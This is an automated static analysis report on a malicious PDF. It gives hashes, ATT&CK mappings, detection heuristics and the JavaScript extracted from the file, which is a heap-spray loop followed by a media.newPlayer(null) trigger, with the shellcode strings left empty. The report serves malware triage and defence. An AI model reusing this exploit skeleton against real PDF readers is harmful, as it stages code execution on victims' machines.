Malicious PDF — malware analysis report

Static analysis result for SHA-256 ff917bed27ab3bc6…

MALICIOUS

PDF

801 B First seen: 2026-05-11
MD5: 99a0dbb33a4a7b2401be583935a47d65 SHA-1: 1faa7af0b657fd809006b70472201e5a38923d17 SHA-256: ff917bed27ab3bc61b6ba1854658642bd48b8ebb2c0ab1d3cc8c58d3048e9636
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1027 Obfuscated Files or Information

The PDF file contains embedded and obfuscated JavaScript. The heuristics indicate the use of unescape() and general script obfuscation, suggesting the script's purpose is to download and execute a secondary payload. The extracted artifact 'javascript_obj0005_000.js' is the likely source of this malicious behavior. Due to the obfuscation, the exact download URL or execution method cannot be confidently determined.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var Wo = unescape("");
var yR = unescape("");
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js pdf-javascript-stream PDF /JS object 5 at offset 0x156 277 bytes
SHA-256: 9849e12e9dc43add43202113fb7aaa4ff22678d4fe533bf79320241dac284438
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var Wo = unescape("");
var yR = unescape("");


memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo;
	i++;
}

util.printd("", new Date());
util.printd("", new Date());
try {var ob = this.media;
ob["new"+"Pl"+"ayer"](null);} 
catch(e) {}
util.printd("", new Date());

Open this report in the interactive analyzer, or submit your own file for analysis.